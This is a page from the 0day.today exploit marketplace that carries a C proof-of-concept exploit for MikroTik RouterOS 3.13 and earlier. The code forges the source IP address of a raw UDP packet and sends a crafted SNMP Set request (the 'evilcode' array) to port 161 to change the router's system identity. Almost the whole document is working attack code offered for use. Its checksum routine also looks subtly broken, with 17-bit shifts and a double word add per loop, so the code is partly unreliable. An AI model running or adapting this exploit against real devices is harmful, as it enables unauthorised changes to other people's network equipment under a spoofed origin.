0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC
[======================================================
MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC
======================================================
/* --------------------------------------------------------------------------
* (c) ShadOS 2008
* _ _ _ _ _ __ _ _ _
* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
* hellknights.void.ru |___/ .0x48k.
*
* --------------------------------------------------------------------------
*
* Title: MicroTik RouterOS <=3.13 SNMP write (Set request) PoC exploit.
*
* Vendor: www.mikrotik.com
*
* Vulnerable versions: 2.9.51 (2.9.x branch), 3.13 (3.x branch)
* (prior versions also affected).
*
* Funded: 03.09.2008 by ShadOS (http://hellknights.void.ru)
*
* Let's see the manual:
* http://www.mikrotik.com/testdocs/ros/2.9/root/snmp_content.php
*
*
* [QUOTE]
*
* > SNMP Service
* >
* > General Information
* >
* > Summary
* >
* > ... RouterOS supports only Get, which means that you can use this implementation only for network monitoring.
* >
* >
* > The MikroTik RouterOS supports:
* >
* > SNMPv1 only
* > Read-only access is provided to the NMS (network management system)
* > User defined communities are supported
* > Get and GetNext actions
* > No Set support
* > No Trap support
* >
*
*
* [/QUOTE]
*
*
* Don't forget to visit our site and my homepage for new releases:
* http://hellknights.void.ru
* http://shados.freeweb7.com
* Also, you can mail me any bugs or suggestions:
* mailto: shados /at/ mail /dot/ ru
*
* Thanks 2 cih.ms and all my friends.
* --------------------------------------------------------------------------
*
* Copyright (C) 89, 90, 91, 1995-2008 Free Software Foundation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
* --------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <memory.h>
#include <string.h>
unsigned char evilcode[49] = {
0x33, 0x02, 0x01, 0x02, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x18, 0x30, 0x16, 0x06, 0x08,
0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x05, 0x00, 0x04, 0x17, 0x57, 0x72, 0x69, 0x74, 0x65, 0x20,
0x69, 0x73, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x65, 0x64,
0x21
};
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff);
sum += (sum >> 17);
answer = -sum;
return (answer);
}
int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
{
char *packet;
struct sockaddr_in dstaddr;
struct iphdr *ip;
struct udphdr *udp;
packet = (char *)malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + len);
memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
if (packet == NULL) { printf("Malloc failed\n"); exit(-1); }
ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+sizeof(struct iphdr));
ip->saddr = *saddr;
ip->daddr = *daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255;
ip->id = htons((unsigned short) rand());
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
ip->check = in_cksum(ip, sizeof(struct iphdr));
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(sizeof(struct udphdr) + len);
memcpy(packet + (sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
dstaddr.sin_family = AF_INET;
dstaddr.sin_addr.s_addr = *daddr;
if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
perror("sendto() failed");
free(packet);
}
char * makereq(char *community,int *size)
{
char *buf;
char *ptr;
int len;
int i;
len = 7 + strlen(community) + sizeof(evilcode);
buf = (char *)malloc(len);
ptr = buf;
*ptr++ = 0x30;
*ptr++ = len;
/* Snmp Version */
*ptr++ = 0x02;
*ptr++ = 0x01;
*ptr++ = 0x00;
/* Community */
*ptr++ = 0x04;
*ptr++ = strlen(community);
strcpy(ptr,community);
ptr = ptr + strlen(community);
*ptr++ = 0xA3; /* Set Request */
memcpy(ptr, evilcode, sizeof(evilcode));
ptr = ptr + sizeof(evilcode);
*size = len+1;
return buf;
}
int erexit(char *msg)
{
printf("%s\n",msg);
exit (-1) ;
}
int usage()
{
printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
}
int main(int argc, char **argv)
{
char *saddr,*daddr,*community;
unsigned char *buf;
int size;
int sock;
unsigned long lsaddr,ldaddr;
int i;
saddr = NULL;
daddr = NULL;
if (argc != 7) { usage(); erexit("not enough args\n"); }
if (!strcmp(argv[1],"-s"))
saddr = strdup(argv[2]);
if (!strcmp(argv[3],"-d"))
daddr = strdup(argv[4]);
if (!strcmp(argv[5],"-c"))
community = strdup(argv[6]);
printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
erexit("Invalid source/destination IP address\n");
if (saddr == NULL) { usage(); erexit("No Source Address"); }
if (daddr == NULL) { usage(); erexit("No Dest Address"); }
sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
if (sock == -1)
erexit("Couldnt open Raw socket!(Are you root?)\n");
lsaddr = inet_addr(saddr);
ldaddr = inet_addr(daddr);
buf = makereq(community,&size);
printf("Sending %d bytes buffer:\n",size);
for (i=0;i<size;i++)
printf("0x%02x ",buf[i]);
printf("\n");
sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
fprintf(stdout,"Sent packet. \"/system identity\" must be changed.\n");
return 0;
}
# 0day.today [2024-11-15] #